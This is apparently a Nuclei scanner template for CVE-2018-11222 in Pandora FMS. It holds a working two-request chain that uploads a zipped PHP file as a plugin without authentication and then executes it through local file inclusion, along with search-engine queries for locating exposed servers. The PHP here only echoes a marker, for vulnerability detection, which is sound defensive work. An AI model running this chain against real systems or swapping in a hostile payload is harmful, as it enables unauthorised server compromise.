Pandora FMS versions <=7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload (CVE-2018-11221) and a local file inclusion (CVE-2018-11222). An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of the server.
PoC代码[已公开]
id: CVE-2018-11222
info:
name: Pandora FMS <=7.0NG.722 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Pandora FMS versions <=7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload (CVE-2018-11221) and a local file inclusion (CVE-2018-11222). An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of the server.
impact: |
Unauthenticated attackers can upload malicious PHP files and execute them via local file inclusion, leading to complete server compromise and access to all managed systems.
remediation: |
Upgrade to Pandora FMS version 7.0NG.723 or later.
reference:
- https://blog.hackercat.ninja/post/pandoras_box/
- https://github.com/pandorafms/pandorafms
- https://nvd.nist.gov/vuln/detail/CVE-2018-11222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-11222
cwe-id: CWE-20
epss-score: 0.03828
epss-percentile: 0.87828
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: artica
product: pandora_fms
shodan-query:
- http.html:"pandora fms - installation wizard"
- http.title:"pandora fms"
fofa-query:
- body="pandora fms - installation wizard"
- title="pandora fms"
google-query: intitle:"pandora fms"
tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive,vkev,vuln
variables:
marker: "{{randstr}}"
b64marker: "{{base64(marker)}}"
filename: "{{rand_base(5)}}"
http:
- raw:
- |
POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------Sh5BXowDBYvdaiPqkMSZas
Connection: keep-alive
--------------------------Sh5BXowDBYvdaiPqkMSZas
Content-Disposition: form-data; name="name"
upfile
--------------------------Sh5BXowDBYvdaiPqkMSZas
Content-Disposition: form-data; name="filename"
plugin.oum
--------------------------Sh5BXowDBYvdaiPqkMSZas
Content-Disposition: form-data; name="upfile"; filename="plugin.oum"
Content-Type: application/octet-stream
{{zip('plugin/phpinfo.php','<?php echo base64_decode(\'{{b64marker}}\'); ?>')}}
--------------------------Sh5BXowDBYvdaiPqkMSZas--
matchers:
- type: word
part: body
words:
- '"status":"success"'
- '"package":"'
condition: and
extractors:
- type: regex
name: path
part: body
group: 1
regex:
- '"package":"(.*?)"'
internal: true
- raw:
- |
GET /pandora_console/ajax.php?page={{replace(path,"\\","")}}/plugin/phpinfo HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{marker}}'
# digest: 4a0a0047304502206bb70b7d26d081d7511f82b663bdf1a056f543295df54a139bdda32589a8c7d3022100c4ff38db045d8f24276fc0571ecd661cee95b834926c209c5b47566afb6c110a:922c64590222798bb761d5b6d8e72950